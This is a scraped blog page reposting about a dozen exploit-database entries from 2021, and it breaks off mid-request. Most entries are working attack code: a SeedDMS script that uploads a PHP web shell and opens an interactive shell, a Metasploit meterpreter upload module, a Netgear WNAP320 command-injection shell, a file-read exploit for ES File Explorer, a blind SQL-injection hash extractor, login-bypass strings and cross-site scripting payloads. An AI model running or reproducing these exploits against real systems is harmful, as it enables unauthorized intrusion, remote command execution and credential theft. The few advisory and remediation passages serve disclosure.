# Exploit Title: Seeddms 5.1.10 - Remote Command Execution (RCE) (Authenticated)
# Date: 25/06/2021
# Exploit Author: Bryan Leong <NobodyAtall>
# Vendor Homepage: https://www.seeddms.org/index.php?id=2
# Software Link: https://sourceforge.net/projects/seeddms/files/seeddms-5.0.11/
# Version: Seeddms 5.1.10
# Tested on: Windows 7 x64
# CVE: CVE-2019-12744
import requests
import argparse
import sys
import random
import string
from bs4 import BeautifulSoup
from requests_toolbelt import MultipartEncoder
def sysArgument():
ap = argparse.ArgumentParser()
ap.add_argument("-u", "--username", required=True, help="login username")
ap.add_argument("-p", "--password", required=True, help="login password")
ap.add_argument("--url", required=True, help="target URL Path")
args = vars(ap.parse_args())
return args['username'], args['password'], args['url']
def login(sessionObj, username, password, url):
loginPath = "/op/op.Login.php"
url += loginPath
postData = {
'login': username,
'pwd': password,
'lang' : 'en_GB'
}
try:
rsl = sessionObj.post(url, data=postData)
if(rsl.status_code == 200):
if "Error signing in. User ID or password incorrect." in rsl.text:
print("[!] Incorrect Credential.")
else:
print("[*] Login Successful.")
print("[*] Session Token: " + sessionObj.cookies.get_dict()['mydms_session'])
return sessionObj
else:
print("[!] Something went wrong.")
print("Status Code: %d" % (rsl.status_code))
sys.exit(0)
except Exception as e:
print("[!] Something Went Wrong!")
print(e)
sys.exit(0)
return sessionObj
def formTokenCapturing(sessionObj, url):
path = "/out/out.AddDocument.php?folderid=1&showtree=1"
url += path
formToken = ""
try:
rsl = sessionObj.get(url)
if(rsl.status_code == 200):
print("[*] Captured Form Token.")
#extracting form token
soup = BeautifulSoup(rsl.text,'html.parser')
form1 = soup.findAll("form", {"id": "form1"})
soup = BeautifulSoup(str(form1[0]),'html.parser')
formToken = soup.find("input", {"name": "formtoken"})
print("[*] Form Token: " + formToken.attrs['value'])
return sessionObj, formToken.attrs['value']
else:
print("[!] Something went wrong.")
print("Status Code: %d" % (rsl.status_code))
sys.exit(0)
except Exception as e:
print("[!] Something Went Wrong!")
print(e)
sys.exit(0)
return sessionObj, formToken
def uploadingPHP(sessionObj, url, formToken):
path = "/op/op.AddDocument.php"
url += path
#generating random name
letters = string.ascii_lowercase
rand_name = ''.join(random.choice(letters) for i in range(20))
#POST Data
payload = {
'formtoken' : formToken,
'folderid' : '1',
'showtree' : '1',
'name' : rand_name,
'comment' : '',
'keywords' : '',
'sequence' : '2',
'presetexpdate' : 'never',
'expdate' : '',
'ownerid' : '1',
'reqversion' : '1',
'userfile[]' : (
'%s.php' % (rand_name),
open('phpCmdInjection.php', 'rb'),
'application/x-httpd-php'
),
'version_comment' : ''
}
multiPartEncodedData = MultipartEncoder(payload)
try:
rsl = sessionObj.post(url, data=multiPartEncodedData, headers={'Content-Type' : multiPartEncodedData.content_type})
if(rsl.status_code == 200):
print("[*] Command Injection PHP Code Uploaded.")
print("[*] Name in Document Content Shows: " + rand_name)
return sessionObj, rand_name
else:
print("[!] Something went wrong.")
print("Status Code: %d" % (rsl.status_code))
sys.exit(0)
except Exception as e:
print("[!] Something Went Wrong!")
print(e)
sys.exit(0)
return sessionObj, rand_name
def getDocID(sessionObj, url, docName):
path = "/out/out.ViewFolder.php?folderid=1"
url += path
try:
rsl = sessionObj.get(url)
if(rsl.status_code == 200):
#searching & extracting document id storing payload
soup = BeautifulSoup(rsl.text,'html.parser')
viewFolderTables = soup.findAll("table", {"id": "viewfolder-table"})
soup = BeautifulSoup(str(viewFolderTables[0]),'html.parser')
rowsDoc = soup.findAll("tr", {"class": "table-row-document"})
for i in range(len(rowsDoc)):
soup = BeautifulSoup(str(rowsDoc[i]),'html.parser')
tdExtracted = soup.findAll("td")
foundDocName = tdExtracted[1].contents[0].contents[0]
#when document name matched uploaded document name
if(foundDocName == docName):
print("[*] Found Payload Document Name. Extracting Document ID...")
tmp = tdExtracted[1].contents[0].attrs['href'].split('?')
docID = tmp[1].replace("&showtree=1", "").replace('documentid=', '')
print("[*] Document ID: " + docID)
return sessionObj, docID
#after loops & still unable to find matched uploaded Document Name
print("[!] Unable to find document ID.")
sys.exit(0)
else:
print("[!] Something went wrong.")
print("Status Code: %d" % (rsl.status_code))
sys.exit(0)
except Exception as e:
print("[!] Something Went Wrong!")
print(e)
sys.exit(0)
return sessionObj
def shell(sessionObj, url, docID):
#remove the directory /seeddms-5.1.x
splitUrl = url.split('/')
remLastDir = splitUrl[:-1]
url = ""
#recontruct url
for text in remLastDir:
url += text + "/"
#path storing uploaded php code
path = "/data/1048576/%s/1.php" % docID
url += path
#checking does the uploaded php exists?
rsl = sessionObj.get(url)
if(rsl.status_code == 200):
print("[*] PHP Script Exist!")
print("[*] Injecting some shell command.")
#1st test injecting whoami command
data = {
'cmd' : 'whoami'
}
rsl = sessionObj.post(url, data=data)
if(rsl.text != ""):
print("[*] There's response from the PHP script!")
print('[*] System Current User: ' + rsl.text.replace("<pre>", "").replace("</pre>", ""))
print("[*] Spawning Shell. type .exit to exit the shell", end="\n\n")
#start shell iteration
while(True):
cmd = input("[Seeddms Shell]$ ")
if(cmd == ".exit"):
print("[*] Exiting shell.")
sys.exit(0)
data = {
'cmd' : cmd
}
rsl = sessionObj.post(url, data=data)
print(rsl.text.replace("<pre>", "").replace("</pre>", ""))
else:
print("[!] No response from PHP script. Something went wrong.")
sys.exit(0)
else:
print("[!] PHP Script Not Found!!")
print(rsl.status_code)
sys.exit(0)
def main():
username, password, url = sysArgument()
sessionObj = requests.Session()
#getting session token from logging in
sessionObj = login(sessionObj, username, password, url)
#capturing form token for adding document
sessionObj, formToken = formTokenCapturing(sessionObj, url)
#uploading php code for system command injection
sessionObj, docName = uploadingPHP(sessionObj, url, formToken)
#getting document id
sessionObj, docID = getDocID(sessionObj, url, docName)
#spawning shell to exec system Command
shell(sessionObj, url, docID)
if __name__ == "__main__":
main()
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863130289
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: SAPSprint 7.60 - 'SAPSprint' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 21-06-2021
# Vendor Homepage: https://brother.com/
# Tested Version: 7.60
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise 64 bits
# Step to discover Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
SAPSprint SAPSprint C:\Program Files\SAP\SAPSprint\sapsprint.exe Auto
C:\>sc qc SAPSprint
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: SAPSprint
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME: C:\Program Files\SAP\SAPSprint\sapsprint.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : SAPSprint
DEPENDENCIES : Spooler
SERVICE_START_NAME: LocalSystem
# Exploit Title: WordPress Plugin YOP Polls 6.2.7 - Stored Cross Site Scripting (XSS)
# Date: 09/06/2021
# Exploit Author: inspired - Toby Jackson
# Vendor Homepage: https://yop-poll.com/
# Blog Post: https://www.in-spired.xyz/discovering-wordpress-plugin-yop-polls-v6-2-7-stored-xss/
# Software Link: https://en-gb.wordpress.org/plugins/yop-poll/
# Version: Tested on version 6.2.7 (Older versions may be affected)
# Tested on: WordPress
# Category : Webapps
## I. Vulnerability
Stored Cross Site Scripting (XSS)
## II. Product Overview
The software allows users to quickly generate polls and voting systems for their blog posts without any need for programming knowledge.
## III. Exploit
When a poll is created that allows other answers and then the setting is enabled for displaying the other responses after submission, the other answer is not sanitized when displayed back to the user, showing an XSS vulnerability. It is, however, correctly sanitized when displaying the other choices on the initial vote page.
## IV. Vulnerable Code
The vulnerable code resides in the fact the results are echoed back to the user without any sanitization performed on the output. It also gets stored in the database as it's inserts.
## IV. Proof of Concept
- Create a new poll that allows other answers, with the results of the other answers being displayed after voting.
- Set the permissions to whoever you'd like to be able to vote.
- Place it on a blog post.
- Insert '<script>alert('xss')</script>' into the other box.
- Submit vote. The payload gets triggered when reflected back to users.
- Whenever a new user votes, they will also be affected by the payload.
## VI. Impact
An attacker can leave stored javascript payloads to be executed whenever a user votes and views the results screen. This could lead to them stealing cookies, logging keystrokes and even stealing passwords from autocomplete forms.
## VII. SYSTEMS AFFECTED
WordPress websites running "YOP Polls" plugin version 6.2.7 (older versions may also be affected).
## VIII. REMEDIATION
Update the plugin to v6.2.8.
## VIIII. DISCLOSURE TIMELINE
-------------------------
June 9, 2021 1: Vulnerability identified.
June 9, 2021 2: Informed developer of the vulnerability.
June 10, 2021 1: Vendor requested proof of concept.
June 10, 2021 2: Sent proof of concept and accompanying details.
June 14, 2021 1: Vendor emails to state the vulnerability has been fixed.
June 16, 2021 1: Confirmed fix, vendor happy to disclose the vulnerability.
June 17, 2021 1: Requested CVE Number.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Lightweight facebook-styled blog authenticated remote code execution",
'Description' => %q{
This module exploits the file upload vulnerability of Lightweight self-hosted facebook-styled PHP blog and allows remote code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Maide Ilkay Aydogdu <ilkay@prodaft.com>' # author & msf module
],
'References' =>
[
['URL', 'https://prodaft.com']
],
'DefaultOptions' =>
{
'SSL' => false,
'WfsDelay' => 5,
},
'Platform' => ['php'],
'Arch' => [ ARCH_PHP],
'Targets' =>
[
['PHP payload',
{
'Platform' => 'PHP',
'Arch' => ARCH_PHP,
'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/bind_tcp'}
}
]
],
'Privileged' => false,
'DisclosureDate' => "Dec 19 2018",
'DefaultTarget' => 0
))
register_options(
[
OptString.new('USERNAME', [true, 'Blog username', 'demo']),
OptString.new('PASSWORD', [true, 'Blog password', 'demo']),
OptString.new('TARGETURI', [true, 'The URI of the arkei gate', '/'])
]
)
end
def login
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
)
cookie = res.get_cookies
token = res.body.split('":"')[1].split('"')[0]
# token = res.to_s.scan(/"[abcdef0-9]{10}"}/)[0].to_s.tr('"}', '')
print_status("Got CSRF token: #{token}")
print_status('Logging into the blog...')
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'ajax.php'),
'headers' => {
'Csrf-Token' => token,
},
'cookie' => cookie,
'data' => "action=login&nick=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}",
)
if res && res.code == 200
print_good("Successfully logged in with #{datastore['USERNAME']}")
json = res.get_json_document
if json.empty? && json['error']
print_error('Login failed!')
return nil, nil
end
else
print_error("Login failed! Status code #{res.code}")
return nil, nil
end
return cookie, token
end
def exploit
cookie, token = login
unless cookie || token
fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed")
end
data = Rex::MIME::Message.new # jWPU1tZmoAZgooopowaNGjRq0KhBowaNGjRqEHYAALgBALdg7lyPAAAAAElFTkSuQmCC
png = Base64.decode64('iVBORw0KGgoAAAANSUhEUgAAABgAAAAbCAIAAADpgdgBAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAJElEQVQ4') # only the PNG header
data.add_part(png+payload.encoded, 'image/png', 'binary', "form-data; name=\"file\"; filename=\"mia.php\"")
print_status('Uploading shell...')
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'ajax.php'),
'cookie' => cookie,
'vars_get' => {
'action' => 'upload_image'
},
'headers' => {
'Csrf-Token' => token,
},
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s,
)
# print_status(res.to_s)
if res && res.code == 200
json = res.get_json_document
if json.empty? || !json['path']
fail_with(Failure::UnexpectedReply, 'Unexpected json response')
end
print_good("Shell uploaded as #{json['path']}")
else
print_error("Server responded with code #{res.code}")
print_error("Failed to upload shell")
return false
end
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, json['path'])}, 3
)
print_good("Payload successfully triggered !")
end
end
# Exploit Title: ES File Explorer 4.1.9.7.4 - Arbitrary File Read
# Date: 29/06/2021
# Exploit Author: Nehal Zaman
# Version: ES File Explorer v4.1.9.7.4
# Tested on: Android
# CVE : CVE-2019-6447
import requests
import json
import ast
import sys
if len(sys.argv) < 3:
print(f"USAGE {sys.argv[0]} <command> <IP> [file to download]")
sys.exit(1)
url = 'http://' + sys.argv[2] + ':59777'
cmd = sys.argv[1]
cmds = ['listFiles','listPics','listVideos','listAudios','listApps','listAppsSystem','listAppsPhone','listAppsSdcard','listAppsAll','getFile','getDeviceInfo']
listCmds = cmds[:9]
if cmd not in cmds:
print("[-] WRONG COMMAND!")
print("Available commands : ")
print(" listFiles : List all Files.")
print(" listPics : List all Pictures.")
print(" listVideos : List all videos.")
print(" listAudios : List all audios.")
print(" listApps : List Applications installed.")
print(" listAppsSystem : List System apps.")
print(" listAppsPhone : List Communication related apps.")
print(" listAppsSdcard : List apps on the SDCard.")
print(" listAppsAll : List all Application.")
print(" getFile : Download a file.")
print(" getDeviceInfo : Get device info.")
sys.exit(1)
print("\n==================================================================")
print("| ES File Explorer Open Port Vulnerability : CVE-2019-6447 |")
print("| Coded By : Nehal a.k.a PwnerSec |")
print("==================================================================\n")
header = {"Content-Type" : "application/json"}
proxy = {"http":"http://127.0.0.1:8080", "https":"https://127.0.0.1:8080"}
def httpPost(cmd):
data = json.dumps({"command":cmd})
response = requests.post(url, headers=header, data=data)
return ast.literal_eval(response.text)
def parse(text, keys):
for dic in text:
for key in keys:
print(f"{key} : {dic[key]}")
print('')
def do_listing(cmd):
response = httpPost(cmd)
if len(response) == 0:
keys = []
else:
keys = list(response[0].keys())
parse(response, keys)
if cmd in listCmds:
do_listing(cmd)
elif cmd == cmds[9]:
if len(sys.argv) != 4:
print("[+] Include file name to download.")
sys.exit(1)
elif sys.argv[3][0] != '/':
print("[-] You need to provide full path of the file.")
sys.exit(1)
else:
path = sys.argv[3]
print("[+] Downloading file...")
response = requests.get(url + path)
with open('out.dat','wb') as wf:
wf.write(response.content)
print("[+] Done. Saved as `out.dat`.")
elif cmd == cmds[10]:
response = httpPost(cmd)
keys = list(response.keys())
for key in keys:
print(f"{key} : {response[key]}")
# Exploit Title: Netgear WNAP320 2.0.3 - 'macAddress' Remote Code Execution (RCE) (Unauthenticated)
# Vulnerability: Remote Command Execution on /boardDataWW.php macAddress parameter
# Notes: The RCE doesn't need to be authenticated
# Date: 26/06/2021
# Exploit Author: Bryan Leong <NobodyAtall>
# IoT Device: Netgear WNAP320 Access Point
# Version: WNAP320 Access Point Firmware v2.0.3
import requests
import sys
if(len(sys.argv) != 2):
print('Must specify the IP parameter')
print("eg: python3 wnap320_v2_0_3.py <IP>")
sys.exit(0)
host = sys.argv[1]
port = 80
cmd = ''
while(True):
cmd = input('Shell_CMD$ ')
#injecting system command part writing the command output to a output file
data = {
'macAddress' : '112233445566;' + cmd + ' > ./output #',
'reginfo' : '0',
'writeData' : 'Submit'
}
url = 'http://' + host + '/boardDataWW.php'
response = requests.post(url, data=data)
if(response.ok):
#read the command output result
url = 'http://' + host + '/output'
cmdOutput = requests.get(url)
print(cmdOutput.text)
#remove trace
cmd = 'rm ./output'
data = {
'macAddress' : '112233445566;' + cmd + ' #',
'reginfo' : '0',
'writeData' : 'Submit'
}
url = 'http://' + host + '/boardDataWW.php'
response = requests.post(url, data=data)
else:
print('[!] No response from the server.')
# Exploit Title: Atlassian Jira Server/Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS)
# Date: 06/05/2021
# Exploit Author: CAPTAIN_HOOK
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/jira/download/data-center
# Version: versions < 8.5.14, 8.6.0 ≤ version < 8.13.6, 8.14.0 ≤ version < 8.16.1
# Tested on: ANY
# CVE : CVE-2021-26078
Description:
The number range searcher component in Jira Server and Jira Data Center before version 8.5.14, from version 8.6.0 before version 8.13.6, and from version 8.14.0 before version 8.16.1 allows remote attackers inject arbitrary HTML or JavaScript via across site scripting (XSS) vulnerability
*Fixed versions:*
- 8.5.14
- 8.13.6
- 8.16.1
- 8.17.0
POC:
- *Story points* custom field that exists by default in all JIRA Server has 3 types of Search template ( None , number range searcher, number searcher) By default the value of Search template is number range searcher OR number searcher. if the value of Search template was set on number range searcher the JIRA server is vulnerable to XSS attack by lowest privilege . For Testing Check the Story points custom field and it's details ( for verifying that the Search template sets on number range searcher) with your ADMIN account ( just like the images) and in the other window Type this With your least privilege
user : jql=issuetype%20%3D%20Epic%20AND%20%22Story%20Points%22%20%3C%3D%20%22%5C%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E%22%20AND%20%22Story%20Points%22%20%3E%3D%20%221%22
Your XSS Will be triggered immediately.
Reference:
https://jira.atlassian.com/browse/JRASERVER-72392?error=login_required&error_description=Login+required&state=9b05ec1f-587c-4014-9053-b6fdbb1efa21
# Exploit Title: Apache Superset 1.1.0 - Time-Based Account Enumeration
# Author: Dolev Farhi
# Date: 2021-05-13
# Vendor Homepage: https://superset.apache.org/
# Version: 1.1.0
# Tested on: Ubuntu
import sys
import requests
import time
scheme = 'http'
host = '192.168.1.1'
port = 8080
# change with your wordlist
usernames = ['guest', 'admin', 'administrator', 'idontexist', 'superset']
url = '{}://{}:{}'.format(scheme, host, port)
login_endpoint = '/login/'
session = requests.Session()
def get_csrf():
token = None
r = session.get(url + login_endpoint, verify=False)
for line in r.text.splitlines():
if 'csrf_token' in line:
try:
token = line.strip().split('"')[-2]
except:
pass
return token
csrf_token = get_csrf()
if not csrf_token:
print('Could not obtain CSRF token, the exploit will likely fail.')
sys.exit(1)
data = {
'csrf_token':csrf_token,
'username':'',
'password':'abc'
}
attempts = {}
found = False
for user in usernames:
start = time.time()
data['username'] = user
r = session.post(url + login_endpoint, data=data, verify=False, allow_redirects=True)
roundtrip = time.time() - start
attempts["%.4f" % roundtrip] = user
print('[!] Accounts existence probability is sorted from high to low')
count = 0
for key in sorted(attempts, reverse=True):
count += 1
print("%s. %s (timing: %s)" % (count, attempts[key], key))
# Exploit Title: phpAbook 0.9i - SQL Injection
# Date: 2021-06-29
# Vendor Homepage: http://sourceforge.net/projects/phpabook/
# Exploit Author: Said Cortes, Alejandro Perez
# Version: v0.9i
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
import requests
import argparse
import string
import sys
def exploit(session,host):
print("Starting Exploit\nSearching Admin Hash...")
passwordhash = ''
for i in range(1,33):
charset = string.digits + string.ascii_lowercase
for letter in charset:
burp0_url = f"{host}/index.php"
burp0_data = {"auth_user": f"admin'-IF((SELECT MID(password,{i},1) from ab_auth_user where uid=1)='{letter}',SLEEP(3),0)#", "auth_passwd": "admin", "lang": "en", "submit": "Login"}
try:
session.post(burp0_url, data=burp0_data, timeout=1)
except requests.Timeout:
passwordhash += letter
continue
print("admin:"+passwordhash)
if __name__ == "__main__" :
session = requests.session()
parser = argparse.ArgumentParser()
parser.add_argument("-u","--url",help="host url \nex: http://127.0.0.1/phpabook",required=True)
arg = parser.parse_args()
exploit(session,arg.url)
# Exploit Title: Online Voting System 1.0 - Authentication Bypass (SQLi)
# Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker
# Date 30.06.2021
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/4808/voting-system-php.html
# Version 1.0
# Tested on: Ubuntu 20.04
####################
# Proof of Concept #
####################
POST /Online_voting_system/admin/ HTTP/1.1
Host: localhost
Content-Length: 50
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/Online_voting_system/admin/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=4ad205f46c868d2bc83e368352d0396a
Connection: close
UserName=admin&Password=%27+or+%27%27%3D%27&Login=
###########
# Payload #
###########
UserName=admin
Password=' or ''='
# Exploit Title: Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass)
# Date: 06/30/2021
# Exploit Author: Murat DEMIRCI (butterflyhunt3r)
# Vendor Homepage: https://www.codester.com/
# Software Link: https://www.codester.com/items/31349/medisol-doctors-patients-managment-system
# Version: 1.0
# Tested on: Windows 10
# Description : The admin login of this app is vulnerable to sql injection login bypass. Anyone can bypass admin login authentication.
# Proof of Concept :
http://test.com/PATH/signin
# Username : anything
# Password : ' or '1'='1
# Exploit Title: Simple Traffic Offense System 1.0 - 'Multiple' Stored Cross Site Scripting (XSS)
# Date: 30-06-2021
# Exploit Author: Barış Yıldızoğlu
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/trafic.zip
# Version: 1.0
# Tested on: Windows 10 Home 64 Bit + Wampserver Version 3.2.3
# Description: Almost all inputs contain Stored XSS on the website
Request:
POST /Trafic/save-reported.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
Firefox/78.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 168
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/Trafic/report-offence.php
Cookie: PHPSESSID=vbsq5n2m09etst1mfcmq84gifo
Upgrade-Insecure-Requests: 1
offence_id={Payload here}&vehicle_no={Payload here}&driver_license={Payload
here}&name={Payload here}&address={Payload here}&gender={Payload
here}&officer_reporting={Payload here}&offence={Payload here}
# Steps to Reproduce:
[1.] Login to the system [+] username=Torrahclef&pass=yemiyemi
[2.] Go to the Report Offense page
[3.] Send the request above with the Stored XSS payload
[4.] Dashboard and Offense list pages will be triggered
# Exploit Title: Vianeos OctoPUS 5 - 'login_user' SQLi
# Date: 01/07/2021
# Exploit Author: Audencia Business SCHOOL
# Vendor Homepage: http://www.vianeos.com/en/home-vianeos/
# Software Link: http://www.vianeos.com/en/octopus/
# Version: > V5
# Tested on: Fedora / Apache2 / MariaDB
Octopus V5 SQLi
The "login_user =" parameter present in the POST authentication request is vulnerable to an Time Based SQLi as follow :
```
Parameter: login_user (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: signin_user=1&login_user=1' AND (SELECT 8860 FROM (SELECT(SLEEP(5)))xENj) AND 'OoKG'='OoKG&password_user=1
```
# Exploit Title: Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated)
# Date 30.06.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://www.xcloner.com/
# Software Link: https://downloads.wordpress.org/plugin/xcloner-backup-and-restore.4.2.12.zip
# Version: 4.2.1 - 4.2.12
# Tested on: Ubuntu 18.04
# CVE: CVE-2020-35948
# CWE: CWE-732
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/CVE-2020-35948-Exploit/README.md
'''
Description:
An issue was discovered in the XCloner Backup and Restore plugin before 4.2.13 for WordPress. It gave authenticated attackers the ability to modify arbitrary files,
including PHP files. Doing so would allow an attacker to achieve remote code execution. The xcloner_restore.php write_file_action could overwrite wp-config.php,
for example. Alternatively, an attacker could create an exploit chain to obtain a database dump.
'''
'''
Banner:
'''
banner = """
##### # # ####### ##### ### ##### ### ##### ####### ##### # #####
# # # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # #
# # # ##### ##### ##### # # ##### # # ##### ##### ###### ###### # # #####
# # # # # # # # # # # # # ####### # #
# # # # # # # # # # # # # # # # # # # #
##### # ####### ####### ### ####### ### ##### ##### ##### # #####
by @Hacker5preme
"""
print(banner)
'''
Import required modules:
'''
import requests
import argparse
'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='Wordpress Plugin XCloner RCE (Authenticated)')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD
print('')
ajax_cmd = input('[*] Ajax Command to execute: ')
'''
Authentication:
'''
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
# Header:
header = {
'Host': target_ip,
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://' + target_ip,
'Connection': 'close',
'Upgrade-Insecure-Requests': '1'
}
# Body:
body = {
'log': username,
'pwd': password,
'wp-submit': 'Log In',
'testcookie': '1'
}
# Authenticate:
print('')
auth = session.post(auth_url, headers=header, data=body)
auth_header= auth.headers['Set-Cookie']
if 'wordpress_logged_in' in auth_header:
print('[+] Authentication successfull !')
else:
print('[-] Authentication failed !')
exit()
'''
Exploit:
'''
url_exploit = "http://192.168.0.38:80/wordpress//wp-admin/admin-ajax.php?action=restore_backup"
header = {
"Accept": "*/*",
"Content-Type": "multipart/form-data; boundary=------------------------08425016980d7357",
"Connection": "close"
}
# Body:
body = "--------------------------08425016980d7357\r\nContent-Disposition: form-data; name=\"xcloner_action\"\r\n\r\n%s\r\n--------------------------08425016980d7357--\r\n" % (ajax_cmd)
exploit = session.post(url_exploit, headers=header, data=body)
print('')
print(exploit.text)
print('')
# Exploit Title: Online Voting System 1.0 - Remote Code Execution (Authenticated)
# Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker
# Date 30.06.2021
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/4808/voting-system-php.html
# Version 1.0
# Tested on: Ubuntu 20.04
####################
# Proof of Concept #
####################
POST /Online_voting_system/admin/save_candidate.php HTTP/1.1
Host: localhost
Content-Length: 1253
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4G9QRpniTS7gPVqW
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/Online_voting_system/admin/new_candidate.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=4ad205f46c868d2bc83e368352d0396a
Connection: close
------WebKitFormBoundary4G9QRpniTS7gPVqW
Content-Disposition: form-data; name="user_name"
admin
------WebKitFormBoundary4G9QRpniTS7gPVqW
Content-Disposition: form-data; name="rfirstname"
test
------WebKitFormBoundary4G9QRpniTS7gPVqW
Content-Disposition: form-data; name="rlastname"
test
------WebKitFormBoundary4G9QRpniTS7gPVqW
Content-Disposition: form-data; name="rgender"
Male
------WebKitFormBoundary4G9QRpniTS7gPVqW
Content-Disposition: form-data; name="ryear"
1st year
------WebKitFormBoundary4G9QRpniTS7gPVqW
Content-Disposition: form-data; name="rmname"
test
------WebKitFormBoundary4G9QRpniTS7gPVqW
Content-Disposition: form-data; name="rposition"
Governor
------WebKitFormBoundary4G9QRpniTS7gPVqW
Content-Disposition: form-data; name="party"
test
------WebKitFormBoundary4G9QRpniTS7gPVqW
Content-Disposition: form-data; name="image"; filename="test.php"
Content-Type: application/octet-stream
<?php echo exec("whoami"); ?>
------WebKitFormBoundary4G9QRpniTS7gPVqW
Content-Disposition: form-data; name="save"
------WebKitFormBoundary4G9QRpniTS7gPVqW--
########
# Note #
########
Uploaded file will be available at http://localhost/Online_voting_system/admin/upload/
# Exploit Title: AKCP sensorProbe SPX476 - 'Multiple' Cross-Site Scripting (XSS)
# Date: 07-01-2021
# Exploit Author: Tyler Butler
# Vendor Homepage: https://www.akcp.com/
# Software Link: https://www.akcp.com/support-center/customer-login/sensorprobe-series-firmware-download/
# Advisory: https://tbutler.org/2021/06/28/cve-2021-35956
# Version: < SP480-20210624
# CVE: CVE-2021-35956
# Description: Stored cross-site scripting (XSS) in the embedded webserver of AKCP sensorProbe before SP480-20210624 enables remote authenticated attackers to introduce arbitrary JavaScript via the Sensor Description, Email (from/to/cc), System Name, and System Location fields.
1) Stored Cross-Site Scripting via System Settings
POST /system?time=32e004c941f912 HTTP/1.1
Host: [target]
Content-Length: 114
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://[target]
Content-Type: application/x-www-form-urlencoded
